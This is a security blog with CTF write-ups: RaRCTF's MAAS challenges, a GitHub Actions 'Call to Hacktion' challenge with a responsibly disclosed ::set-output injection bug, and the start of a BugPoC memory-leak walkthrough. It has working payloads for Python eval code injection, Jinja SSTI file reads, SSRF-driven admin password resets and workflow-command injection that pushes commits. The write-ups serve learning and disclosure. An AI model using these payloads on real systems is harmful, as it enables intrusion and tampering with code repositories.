It’s been a while since I last played in any CTF, and somehow I ended up playing in 3 concurrent CTFs last weekend – BSides Noida CTF, Defcon Cloud Village CTF, and RarCTF. I ended up working on and solving ~15 challenges total! :exploding_head:

Here’s a summary of the CTF results:

It was a great team effort in achieving such results :)

In this writeup, I will focus solely on the Microservices As A Service (MAAS) challenge from RaRCTF.

Introduction

Microservices As A Service (MAAS) is designed to be a 3-part challenge, but 2 additional parts were added during the competition to (somewhat) address the unintended solutions. Since there is an official writeup, I will only discuss the intended solutions and alternative solutions here.

MAAS consists of 3 microservices – Calculator, Notes, and Manager. The mapping of challenges and microservices are as follows:

  • MAAS 1 - Calculator
  • MAAS 2 - Notes
  • MAAS 2.5 - Notes (Fix for MAAS2)
  • MAAS 3 - Manager
  • MAAS 3.5 - Manager (Fix for MAAS3)

MAAS 1 - Calculator

Let’s jump straight to the source code for the calculator microservice:

@app.route('/arithmetic', methods=["POST"])
def arithmetic():
    if request.form.get('add'):
        r = requests.get(f'http://arithmetic:3000/add?n1={request.form.get("n1")}&n2={request.form.get("n2")}')
    elif request.form.get('sub'):
        r = requests.get(f'http://arithmetic:3000/sub?n1={request.form.get("n1")}&n2={request.form.get("n2")}')
    elif request.form.get('div'):
        r = requests.get(f'http://arithmetic:3000/div?n1={request.form.get("n1")}&n2={request.form.get("n2")}')
    elif request.form.get('mul'):
        r = requests.get(f'http://arithmetic:3000/mul?n1={request.form.get("n1")}&n2={request.form.get("n2")}')
    result = r.json()
    res = result.get('result')
    if not res:
        return str(result.get('error'))
    try:
        res_type = type(eval(res, builtins.__dict__, {})))
        if res_type is int or res_type is float:
            return str(res)
        else:
            return "Result is not a number"
    except NameError:
        return "Result is invalid"

Clearly, having some user-controlled input to eval() allows execution of arbitrary code and leaking of the flag. The /add endpoint simply returns the concatenation of n1 and n2 parameters as strings, allowing us pass a user-controlled input to eval().

If we want to leak the flag directly, we could replace res local variable with the flag such that when the microservice returns the result to the frontend app, we are able to see the flag. However, notice that for the eval(), globals were restricted to builtins.__dict__, and we are unable to access local variables as well.

With access to builtins, we can import arbitrary Python modules using __import__("package_name") and read arbitrary files using open("filename", "r").read(). This allows for a blind exfiltration of the flag, either using a boolean-based (e.g. comparison) or time-based (e.g. using time.sleep()) technique.

A time-based blind exfiltration of the flag can be performed by ensuring that the following string is passed to eval():

exec('''
sleep = __import__("time").sleep
flag = open("/flag.txt", "r").read()
current_char = flag[0] # replace index accordingly
sleep(ord(current_char))
''')

Or, you can also using a comparison-based method to leak characters of the flag one-by-one in the reference solution:

1 if open('/flag.txt', 'r').read()[0] == 'r' else None

But, such blind exfiltration techniques are pretty slow and sometimes unreliable, so let’s just leak the entire flag directly. One possible way to do so is to add a @app.after_request handler to the microservice, intercepting our response and adding the flag to our request.

Here’s an example of how we would have written the code if we were to implement such a handler in the application directly:

@app.after_request
def after_request_func(response):
    if b"res must contain this secret sentence to get flag :)" in response.data:
        response.data = open("/flag.txt","r").read()
    return response

Since we do not have access to global variables, we need to obtain a reference of the app somehow. We can easily get a reference to the current Flask app via flask.current_app.

Putting everything together, this was the payload I used to get the flag:

n1:
[1337,exec('app = __import__("flask").current_app\n@app.after_request\ndef after_request_func(response):\n    if b"res must contain this secret sentence to get flag :)" in response.data:\n        response.data = open("/flag.txt","r").read()\n    return response')]

n2:
[0]

Flag: rarctf{0v3rk1ll_4s_4_s3rv1c3_3fca0faa}

MAAS 2 - Notes

Below is the relevant vulnerable code for the notes backend microservice:

@app.route('/useraction', methods=["POST"])
def useraction():
    mode = request.form.get("mode")
    username = request.form.get("username")
    if mode == "register":
    ...
    elif mode == "bioadd":
        bio = request.form.get("bio")
        bio.replace(".", "").replace("_", "").\
            replace("{", "").replace("}", "").\
            replace("(", "").replace(")", "").\
            replace("|", "")

        bio = re.sub(r'\[\[([^\[\]]+)\]\]', r'', bio)
        red = redis.Redis(host="redis_users")
        port = red.get(username).decode()
        requests.post(f"http://redis_userdata:5000/bio/{port}", json={
            "bio": bio
        })
        return ""
    elif mode == "bioget":
        red = redis.Redis(host="redis_users")
        port = red.get(username).decode()
        r = requests.get(f"http://redis_userdata:5000/bio/{port}")
        return r.text
    ...

@app.route("/render", methods=["POST"])
def render_bio():
    data = request.json.get('data')
    if data is None:
        data = {}
    return render_template_string(request.json.get('bio'), data=data)

Here, we can see that there’s a server-side template injection (SSTI) vulnerability in /render, where we can render the bio of a user. However, we cannot reach this endpoint directly – we can only access this endpoint through the frontend application, which calls /useraction with bioget mode to fetch the user’s bio and then rendering it via /render.

Interestingly, the denylist implementation in bioadd mode is flawed:

bio = request.form.get("bio")
bio.replace(".", "").replace("_", "").\
    replace("{", "").replace("}", "").\
    replace("(", "").replace(")", "").\
    replace("|", "")

Notice that the resulting string after replacing the banned characters is not actually being assigned to bio. This means that we can use any SSTI payloads directly to achieve RCE/arbitrary file read to leak the flag!

To get the flag, we can simply register a user and then update the user’s bio with the following SSTI payload:

{{ _.__eq__.__func__.__globals__.__builtins__.open('/flag.txt').read() }}

Flag: rarctf{wh4t_w4s_1_th1nk1ng..._60a4ee96}

MAAS 2.5 - Notes (Fixed)

Of course, the above solution was an unintended one. The fix was to assign the resulting replacement string back to bio variable.

I actually solved MAAS 2 with the intended solution for MAAS 2.5 before realising the mistake in the bioadd implementation. :man_facepalming:

The only redeeming factor was that I got a first blood :drop_of_blood: on this challenge! :rofl:

The solution I got for this fixed challenge is as per the reference solution – using the Redis migration to override the port of our user to ../bio/ so that we can override the server-side request path to put the SSTI payload in the bio when adding a new key following the migration.

Flag: rarctf{.replace()_1s_n0t_1n_pl4c3...e8d54d13}

MAAS 3 - Manager

Below is the relevant vulnerable code for the app frontend:

@app.route("/manager/update", methods=["POST"])
def manager_update():
    schema = {"type": "object",
              "properties": {
                  "id": {
                      "type": "number",
                      "minimum": int(session['managerid'])
                  },
                  "password": {
                      "type": "string",
                      "minLength": 10
                  }
              }}
    try:
        jsonschema.validate(request.json, schema)
    except jsonschema.exceptions.ValidationError:
        return jsonify({"error": f"Invalid data provided"})
    return jsonify(requests.post("http://manager:5000/update",
                                 data=request.get_data()).json())

The manager backend microservice then relays the JSON data to a Golang backend service.

@app.route("/update", methods=["POST"])
def update():
    return jsonify(requests.post("http://manager_updater:8080/",
                                 data=request.get_data()).json())

It can be seen that the request.get_data() (i.e. the raw request body) instead of request.json (i.e. the parsed JSON object) is being passed to the backend Golang backend service instead. If you have read BishopFox Labs’ article on JSON interoperability vulnerabilities, you will recognise that this can easily introduce inconsistencies in parsing JSON, which leads to unintended behaviours in application flows. In Flask, the parsing of request body as JSON ignores duplicated keys, keeping the last value in the resulting JSON object. But, in the Golang backend service using buger/jsonparser, the first value is returned instead.

If our manager ID is 2, we can send a POST request to /manager/update with the following request body:

{"id":0,"id":2,"password":"some_difficult_password_that_is_hard_for_others_to_guess"}

This bypasses the frontend validation, which sees that the minimum ID value accepted is the last id value – 2. But, on the Golang backend service, it updates the password for manager ID 0 instead!

As a result, we can simply log in as admin with the password we set above to obtain the flag.

Flag: rarctf{rfc8259_15_4_b1t_v4gu3_1a97a3d3}

MAAS 3.5 - Manager (Fixed)

Naturally, the above solution was the intended solution, so copy-pasting the same solution from above works for MAAS 3.5.

Sadly, this challenge was pretty much broken even after the fixed version was released. They simply shifted the JSON validation checks from the app frontend to the manager backend service, but that didn’t fully prevent unintended solutions either.

So what went wrong? Well, looking at the docker-compose.yml file provided, it can be observed that network segregation is not done correctly:

version: "3.3"
services:
  app:
    build: app
    ports:
      - "5000:5000"
    depends_on: ["calculator", "notes", "manager"]
    networks:
      - public
      - level-1

  calculator:
    build: calculator
    depends_on: ["checkers", "arithmetic"]
    networks:
      - level-1
      - calculator-net
  checkers:
    build: calculator/checkers
    networks:
      - calculator-net
  arithmetic:
    build: calculator/arithmetic
    networks:
      - calculator-net

  notes:
    build: notes
    depends_on: ["redis_users", "redis_userdata"]
    networks:
      - level-1
      - notes-net
  redis_users:
    image: library/redis:latest
    networks:
      - notes-net
  redis_userdata:
    build: notes/redis_userdata
    networks:
      - notes-net

  manager:
    build: manager
    depends_on: ["manager_users", "manager_updater"]
    networks:
      - level-1
      - manager-net
  manager_users:
    image: library/redis:latest
    networks:
      - manager-net
  manager_updater:
    build: manager/updater
    networks:
      - level-1
      - manager-net

networks:
    public:
        driver: bridge
    level-1:
        driver: bridge
        internal: true
    calculator-net:
        driver: bridge
        internal: true
    notes-net:
      driver: bridge
      internal: true
    manager-net:
      driver: bridge
      internal: true

Notice that the manager_updater Golang service is in both manager-net and level-1 networks. Since calculator and notes are also in level-1 network, we can leverage the arbitrary code execution in calculator or SSTI in notes microservice to perform SSRF, allowing us to perform password update on the admin account using the manager_updater Golang service.

This unintended solution works even with the fixed version of manager, so you didn’t need to know about the JSON interoperability vulnerabilities and could still solve it anyways. :joy:

We can simply use the eval() RCE in calculator microservice to change the admin password, and then log in as admin with the password set to obtain the flag:

[1337,exec('''__import__("requests").post("http://manager_updater:8080/",data='{"id":0,"password":"some_difficult_password_that_is_hard_for_others_to_guess"}')''')][0]

Flag: rarctf{k33p_n3tw0rks_1s0l4t3d_lol_ef2b8ddc}

The GitHub Capture-the-Flag - Call to Hacktion concluded in March 2021, and I was pleasantly surprised to be the first person to complete the challenge! I was intending to do a short writeup on the challenge back then, but the official writeup by GitHub had already explained the vulnerabilities and the solution.

There were some parts which I did not fully understood even after solving the challenge, and I want to take this chance to revisit some of the missed steps. I will also discuss a bug which I chanced upon while performing this deep-dive analysis. Hopefully this article helps to provide deeper insights into the internals of GitHub Actions and explain the whole exploit chain in detail, as well as raise awareness about the dangers of logging untrusted inputs in GitHub Actions.

Introduction

Call to Hacktion is a CTF hosted by GitHub Security Lab that ran from 17 March 2021 to 21 March 2021. The challenge is to exploit a vulnerable GitHub Actions workflow in a player-instanced private repository. Contestants are given read-only access to the repository, and the goal is to exploit the vulnerable workflow to overwrite README.md on the main branch to prove that the contestant had successfully obtained write privileges to the repository (i.e. read-only access -> privilege escalation -> read-write access).

Vulnerable Workflow Analysis

Without further ado, let’s jump straight into the vulnerable workflow (.github/workflows/comment-logger.yml) in the player-instanced challenge repository:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
name: log and process issue comments
on:
  issue_comment:
    types: [created]

jobs:
  issue_comment:
    name: log issue comment
    runs-on: ubuntu-latest
    steps:
      - id: comment_log
        name: log issue comment
        uses: actions/github-script@v3
        env:
          COMMENT_BODY: ${{ github.event.comment.body }}
          COMMENT_ID: ${{ github.event.comment.id }}
        with:
          github-token: "deadc0de"
          script: |
            console.log(process.env.COMMENT_BODY)
            return process.env.COMMENT_ID
          result-encoding: string
      - id: comment_process
        name: process comment
        uses: actions/github-script@v3
        timeout-minutes: 1
        if: ${{ steps.comment_log.outputs.COMMENT_ID }}
        with:
          script: |
            const id = ${{ steps.comment_log.outputs.COMMENT_ID }}
            return ""
          result-encoding: string

If you have been following GitHub Security Lab’s research articles, you may have came across this article by Jaroslav Lobacevski on code/command injection in workflows. Essentially, it is not recommended to use GitHub Actions expression syntax referencing potentially untrusted input in inline scripts, as this can easily lead to code/command injections. On line 30 – const id = ${{ steps.comment_log.outputs.COMMENT_ID }}, it can be seen that a GitHub Actions expression that references an output from a previous job step is being used directly within the inline script. This looked suspicious, and code injection may be possible if the expression value can be controlled by an adversary.

Let’s move on to examine the referenced job step (comment_log) and determine how code injection could be achieved:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
- id: comment_log
  name: log issue comment
  uses: actions/github-script@v3
  env:
    COMMENT_BODY: ${{ github.event.comment.body }}           // attacker-controlled data
    COMMENT_ID: ${{ github.event.comment.id }}               // safe numerical ID generated by GitHub
  with:
    github-token: "deadc0de"
    script: |
      console.log(process.env.COMMENT_BODY)                  // untrusted input logged to standard output!
      return process.env.COMMENT_ID                          // safe value returned
    result-encoding: string
- id: comment_process
  name: process comment
  uses: actions/github-script@v3
  timeout-minutes: 1
  if: ${{ steps.comment_log.outputs.COMMENT_ID }}            // if this output is set from previous job
  with:
    script: |
      const id = ${{ steps.comment_log.outputs.COMMENT_ID }} // fill output value here!
      return ""
    result-encoding: string

Here, the actions/github-script@v3 action is being used. Basically, this action accepts a script argument passed using with: in the workflow file and executes it, allowing easy access to GitHub API and workflow run context. Notice that the comment body is being logged to standard output in the inline script – the attacker controlled data (comment body) ends up being printed to standard output! Using a feature of GitHub Actions known as workflow commands, the action can interact with the Actions runner. It works by parsing the output of the execution step and handling any commands denoted by any output line starting with :: after trimming leading whitespaces.

This means that when an output line such as ::set-output name=[name]::[value] is being logged, it would be possible to access the output value using ${{ steps.[job_id].outputs.[name] }}. In the vulnerable workflow above, it can be seen that it would be possible for an adversary to set ${{ steps.comment_log.outputs.COMMENT_ID }} such that it leads to a code injection in the comment_process step.

To solve the challenge, we first close the const id = variable assignment with 1; and inject JavaScript code using the pre-authenticated octokit/core.js to push a new commit overwriting README.md using GitHub REST API. I ended up with the following solution:

::set-output name=COMMENT_ID::1; console.log(context); console.log(process); await github.request('PUT /repos/{owner}/{repo}/contents/{path}', { owner: 'incrediblysecureinc', repo: 'incredibly-secure-Creastery', path: 'README.md', message: 'Escalated to Read-write Access', content: Buffer.from('Pwned!').toString('base64'), sha: '959c46eb0fbab9ab5b5bfb279ab6d70f720d1207' })

Note: console.log(context); console.log(process); is added purely for debugging and is not actually required to exploit the vulnerable workflow. 959c46eb0fbab9ab5b5bfb279ab6d70f720d1207 refers to the SHA for the git blob (README.md) being updated.

Why Did The Exploit Worked?

Now, we have successfully exploit the vulnerable workflow and solved the challenge. But, we have yet to understand why it worked under the hood.

Let’s continue by enabling logging in the Actions runner. To enable logging, follow the steps in the documentation and set the following repository secrets:

  • ACTIONS_RUNNER_DEBUG to true
  • ACTIONS_STEP_DEBUG to true

Since participants were given read-only access to the repository, it is not possible to set the secrets in the player-instanced repository. I proceeded to create a private test repository, added the debug repository secrets and imported the vulnerable workflow file.

After supplying a test comment, the workflow runs successfully with the following log:

...
##[debug]Starting: log issue comment
##[debug]Loading inputs
##[debug]Loading env
##[group]Run actions/github-script@v3
with:
  github-token: deadc0de
  script: console.log(process.env.COMMENT_BODY)
  return process.env.COMMENT_ID
  result-encoding: string
  debug: false
  user-agent: actions/github-script
env:
  COMMENT_BODY: Test
  COMMENT_ID: 802762169
##[endgroup]
test
::set-output name=result::802762169
##[debug]steps.comment_log.outputs.result='802762169'
##[debug]Node Action run completed with exit code 0
##[debug]Finishing: log issue comment
...

It turns out that the return process.env.COMMENT_ID does not set ${{ steps.comment_log.outputs.COMMENT_ID }} after all!
In fact, the comment_process step is referencing a supposedly non-existent output from the comment_log.

However, we do see ${{ steps.comment_log.outputs.result }} being set. Upon examining the source code of actions/github-script@v3, it is clear why this is the case:

...
const result = await callAsyncFunction(
  {require: require, github, context, core, io},
  script
)

...

core.setOutput('result', output)
...

What Could Go Wrong With Logging Untrusted Inputs? :see_no_evil:

One interesting thought I had was that, what if the workflow relied on outputs.result instead. Is the below modified workflow vulnerable?

...
    uses: actions/github-script@v3
    script: |
      console.log(process.env.COMMENT_BODY)
      return process.env.COMMENT_ID
    result-encoding: string
...
  - id: comment_process
    name: process comment
    uses: actions/github-script@v3
    timeout-minutes: 1
    if: ${{ steps.comment_log.outputs.result }}              // instead of outputs.COMMENT_ID
    with:
      script: |
        const id = ${{ steps.comment_log.outputs.result }}   // instead of outputs.COMMENT_ID
        return ""
      result-encoding: string

The answer is no – if set-output workflow command is executed multiple times for the same output name, only the last value is retained.

Notice that in the above workflow, a trailing newline is enforced implicitly when using console.log().

Now, let’s consider a similar workflow that instead logs untrusted input using process.stdout.write(). Is this vulnerable?

...
    uses: actions/github-script@v3
    script: |
      process.stdout.write(process.env.COMMENT_BODY)         // no trailing newline here
      return process.env.COMMENT_ID                          // does this overwrite existing ::set-output?
    result-encoding: string
...
  - id: comment_process
    name: process comment
    uses: actions/github-script@v3
    timeout-minutes: 1
    if: ${{ steps.comment_log.outputs.result }}              // instead of outputs.COMMENT_ID
    with:
      script: |
        const id = ${{ steps.comment_log.outputs.result }}   // instead of outputs.COMMENT_ID
        return ""
      result-encoding: string

This is a tricky question. I was not sure either, but it turns out this workflow is actually vulnerable!

But why? The Actions Runner reads each line of the step output, parses and executes any workflow commands (lines starting with the :: marker) detected. In the above workflow, the output from process.stdout.write(process.env.COMMENT_BODY) will be concatenated with the output from core.setOutput('result', output) triggered under the hood by the return statement in the inline script.

In other words, if the following comment body is supplied:

::set-output name=result::1; console.log("This should not be executed -- proof that we indeed have code injection:", 7*191);
JUNK

Note: There is no no trailing newline after JUNK.

The output shown in the job execution logs is:

::set-output name=result::1; console.log("This should not be executed -- proof that we indeed have code injection:", 7*191);
##[debug]steps.comment_log.outputs.result='1; console.log("This should not be executed -- proof that we indeed have code injection:", 7*191);'
JUNK::set-output name=result::802762169
##[debug]Node Action run completed with exit code 0
...
This should not be executed -- proof that we indeed have code injection: 1337

Observe that the ::set-output workflow command issued for the return value of the script does not enforces a leading newline prior to being concatenated with the logged untrusted input. This means that we can prevent the return statement from successfully setting the result step output by clobbering the ::set-output command with the untrusted input.

Examining the source code for @actions/core, we can see why this happens:

export function issueCommand(
  command: string,
  properties: CommandProperties,
  message: any
): void {
  const cmd = new Command(command, properties, message)
  process.stdout.write(cmd.toString() + os.EOL) // leading newline not guaranteed
}

As a result of the missing prepended newline, users who mistakenly trust the output of ${{ steps.*.outputs.result }} set by @actions/github-script through @actions/core may end up working with an untrusted value in subsequent job execution steps, which may lead to remote code/command execution and privilege escalation in seemingly secure workflows.

This issue was reported to GitHub via HackerOne and was resolved through the release of an interim solution to prepend a newline in all cores to core.setOutput():

  • @actions/core v1.2.7 [PR]
  • actions/github-script v4.0.2 [PR]

Admittedly, while the interim solution is necessary, it is far from perfect as workflows/actions using core.setOutput() under the hood may cause a lot of unnecessary newlines to appear in the job execution logs. In the future, this issue may be properly addressed with the complete removal of standard output command processing:

“To address the wider risks you bring up more holistically, we’re planning on removing stdout comand processing altogether in favor of a true CLI interface you’d need to explicitly choose to invoke to perform workflow commands. So long as info written to stdout can influence the runtime of an action, it’s no longer safe to print untrusted data to logs (and that’s certainly not a reasonable expectation to set for users of Actions). We may make some of this behavior more strict in the meantime, but long term we’re planning on tearing it out.”

Disclosure Timeline

  • March 23, 2021 – Reported to GitHub Bug Bounty program on HackerOne
  • March 24, 2021 – GitHub – Initial acknowledgement of report
  • April 12, 2021 – Enquired on the status of the report
  • April 12, 2021 – GitHub – Provided update that their engieering teams are still working on triaging this issue
  • April 17, 2021 – GitHub – Asked to review the pull request on @actions/toolkit to implement the interim fix prior to removal of standard output processing of set-output, and informed about long term plan to remove support for standard output processing
  • April 18, 2021 – Verified interim fix in @actions/core is correct, but noted that the dependency of actions/github-script is not updated accordingly. Agreed that depreciating standard output command processing is a good move to eliminate such unexpected vulnerabilities caused by logging untrusted inputs.
  • June 19, 2021 – GitHub – Resolved report and awarded bounty

Conclusion

In the past, there had been security concerns over the workflow commands being parsed and executed by the Actions runner, which leads to unexpected modification of environment variables/path injection and resulting in remote code/command execution in workflows. To mitigate such risks, the GitHub team decided to depreciate several workflow commands. It is strongly recommended to disable workflow commands processing prior to logging any untrusted input to avoid any unexpected behaviour!

Thanks to GitHub Security Lab team for creating this awesome challenge and for the bounty! Taking part in this challenge helped immensely in solidifying my understanding of GitHub Actions and security considerations one should make when creating workflows.

Recently, BugPoC had teamed up with @NahamSec and announced a memory leak challenge sponsored by Amazon on Twitter. The vulnerabilities presented in the challenge are rather realistic. In fact, I did encounter such vulnerabilities a couple of times while doing bug hunting on web applications! Besides presenting a walkthrough of the challenge in this write-up, I will also discuss alternative solutions and include some tips as well. Do read on if you are interested! :smile:

Introduction

The goal of the challenge is to find an insecurely insecurely stored Python variable called SECRET_API_KEY somewhere on the server – http://doggo.buggywebsite.com.

Let’s start by finding out more information about the challenge site provided.

$ dig doggo.buggywebsite.com +short any
doggo.buggywebsite.com.s3-website-us-west-2.amazonaws.com

It seems to be a Amazon S3 website. If the S3 bucket is misconfigured, we could possibly discover new information stored in the bucket, or even mess around with the files in the bucket. You can use a tool such as BucketScanner by @Rzepsky to check for common S3 bucket misconfigurations. Unfortunately, this bucket is not misconfigured, so let’s go back to the challenge site itself.

Visiting the challenge site at http://doggo.buggywebsite.com/, we can see a few images of dogs. Let’s examine the JavaScript file loaded (script.js) to better understand how the images are fetched dynamically:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
const API_ENDPOINT = "https://doggo-api.buggywebsite.com";

async function getURLs(pageNum){
  var PARAMS = {
    1: "gAAAAABgGg49vp03MkS2gsuz1SLZat7_z36Nkc4I-25X4-RtxXd_pxv964ObmIgunslqWO47kWxCWUSdZVCSlgqGnTi7ekqEaA==",
    2: "gAAAAABgGg5OwIOIQGgUJSF_iuwDa8XcB8im0v3l7S-cwZgkufRFsfb5EL4Dawc3ZA_xwyG8BkbIkMnFrl6ACVGzmd_9adDMfA==",
    3: "gAAAAABgGg5dGZ3R5ZHcBV3A4L2QM3-LMxsmbLFTSXWmBiXTa9BgAN8ZhmDQDONVaf7VT_s1CMK-uL8huNQy1wwfQovk1t7Jfw==",
    4: "gAAAAABgGg5u4W_yBC5YgusPCtmKOtxQYAgo161YK_Njo67ZLo6fGm6nyKwRIQ8divqkUL2mymw2fxeKF_BenpqSo79KuMj6JQ=="
  };
  var param = PARAMS[pageNum];
  var endpoint = API_ENDPOINT + '/get-dogs';

  let response = await fetch(endpoint, {
    headers: {
      'x-param': param,
      'x-fingerprint': localStorage.fingerprint,
    }
  });
  let data = await response.json()
  return data['body'];

}

function addImages(urls){
  var div = document.getElementById('images-div');
  div.innerHTML = '';
  for (var i = 0; i < urls.length; i++){
    var img = document.createElement('img');
    img.setAttribute('class', 'pretty-img');
    img.setAttribute('src', urls[i]);
    div.appendChild(img)
    div.appendChild(document.createElement('br'))
  }
}

function loadPage(pageNum){
  document.querySelector('#theLoader').style.display='inline';
  var buttons = document.getElementsByClassName('page-button');
  for (var i = 0; i < buttons.length; i++){
    buttons[i].disabled = false;
  }
  getURLs(pageNum).then(urls => {
    addImages(JSON.parse(urls));
    document.getElementById('button-'+pageNum).disabled = true;
    document.querySelector('#theLoader').style.display='none';
  })
}

async function setFingerprint(){
  if (localStorage.fingerprint == undefined) {
    document.querySelector('#theLoader').style.display='inline';
    var endpoint = API_ENDPOINT + '/fingerprint';
    let response = await fetch(endpoint);
    let data = await response.json()
    localStorage.fingerprint = data['fingerprint'];
  }
}

function initPage(){
  setFingerprint().then(_ => {
    loadPage(1);
  })
}

It seems that there is an API server at https://doggo-api.buggywebsite.com. This API server should be the actual target since the goal is to achieve some form of memory leakage, which we can’t really achieve on http://doggo.buggywebsite.com (a static website hosted on a S3 bucket).

Also, two endpoints can also be observed from the JavaScript code, namely:

  • /get-dogs– an endpoint accepting an encrypted x-param header value and loading different pages of dogs
  • /fingerprint – an endpoint used to obtain some value for fingerprinting the current user.

You may have also noticed that there are four Base-64 encoded strings starting with gAAAAAB. Decoding it yields binary data, indicating that the value may have been encrypted prior to being encoded. Doing a quick search on this substring reveals that this is likely to be using Fernet, an symmetric encryption module commonly used in building Python applications.

Since we do not know the secret key used to create the ciphertext, we cannot decrypt the ciphertext ourselves. There aren’t any relevant known weaknesses in Fernet that allows us to encrypt/decrypt text as well, so let’s just keep these information in mind and move on to examine the other information we just gathered.

/get-dogs Endpoint

Tracing the JavaScript code, we can see whenever a page is requested, a fingerprint value is first obtained from /fingerprint followed by requesting the list of images to load by querying the /get-dogs endpoint with the respective Base-64 encrypted value.

Let’s try to replicate this behaviour to better understand the application flow. We start by obtaining a valid fingerprint value:

$ curl -s -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkm96w1MoKBnTslSzxiHX3VgcK-9j5ETD41Z0Q7zUm-gMCkNUdrJdg10n6l0SKxtmos5CrN4kkYACudYKcx_OGW3eezJ6ScQ3DHx_Sxr9kMavb5NTDKDO57iQPxNwu3DJGw_Sh1uok3McF-rEjTwd9ybzDbWfyFYYS9Ka-Gq6uAzHiNl9Z9sujy5XFUBoAcmEfoatp_Tl3LHCBv7Dbn0Et5YqPe5gxbRlDkvjqyw73nOJD7k=

Then, we attempt to request the dog images for all four Base-64 encoded strings we discovered earlier on.

$ echo 'gAAAAABgGg49vp03MkS2gsuz1SLZat7_z36Nkc4I-25X4-RtxXd_pxv964ObmIgunslqWO47kWxCWUSdZVCSlgqGnTi7ekqEaA==' > 1.b64
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 1.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=1", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog1.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog2.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog3.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog4.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog5.jpg\"]"}

$ echo 'gAAAAABgGg5OwIOIQGgUJSF_iuwDa8XcB8im0v3l7S-cwZgkufRFsfb5EL4Dawc3ZA_xwyG8BkbIkMnFrl6ACVGzmd_9adDMfA==' > 2.b64
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 2.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=2", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog6.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog7.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog8.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog9.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog10.jpg\"]"}

$ echo 'gAAAAABgGg5dGZ3R5ZHcBV3A4L2QM3-LMxsmbLFTSXWmBiXTa9BgAN8ZhmDQDONVaf7VT_s1CMK-uL8huNQy1wwfQovk1t7Jfw==' > 3.b64
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 3.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=3", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog11.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog12.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog13.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog14.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog15.jpg\"]"}

$ echo 'gAAAAABgGg5u4W_yBC5YgusPCtmKOtxQYAgo161YK_Njo67ZLo6fGm6nyKwRIQ8divqkUL2mymw2fxeKF_BenpqSo79KuMj6JQ==' > 4.b64
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 4.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=4", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog16.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog17.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog18.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog19.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog20.jpg\"]"}

Notice that the paths in the responses are largely similar. From our above testing, we can infer that the encrypted value likely contains /dogs?page=1, or perhaps simply ?page=1. Besides that, we also have two new discoveries:

  1. We now know that there is yet another endpoint on this API server – /dogs
  2. We found another S3 bucket at buggy-dog-pics.s3-us-west-2.amazonaws.com (spoiler: nothing much here, really :joy:)

Internal Endpoints

Let’s try to access the /dogs endpoint directly:

$ curl https://doggo-api.buggywebsite.com/dogs
Error, this endpoint is only internally accessible

It seems like this is an endpoint accessible via the internal network only. It’s worth nothing that we could fiddle around with headers such as X-Forwarded-For: 127.0.0.1 to trick the application into thinking that we are making the request from an internal network and be able to access the endpoint, but in this case the server isn’t vulnerable to such attacks.

Let’s move on to fuzz for other endpoints and see what we can do with them:

$ ffuf -u 'https://doggo-api.buggywebsite.com/FUZZ' -w ./SecLists/Discovery/Web-Content/quickhits.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1
________________________________________________

 :: Method           : GET
 :: URL              : https://doggo-api.buggywebsite.com/FUZZ
 :: Wordlist         : FUZZ: ./SecLists/Discovery/Web-Content/quickhits.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

/heapdump               [Status: 401, Size: 50, Words: 7, Lines: 1]

Looks suspicious. Let’s check the response of the /heapdump endpoint:

$ curl https://doggo-api.buggywebsite.com/heapdump
Error, this endpoint is only internally accessible

